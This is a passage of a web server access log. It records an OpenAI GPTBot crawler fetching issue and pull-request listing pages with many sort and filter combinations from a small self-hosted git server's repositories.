AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11270] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:19:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 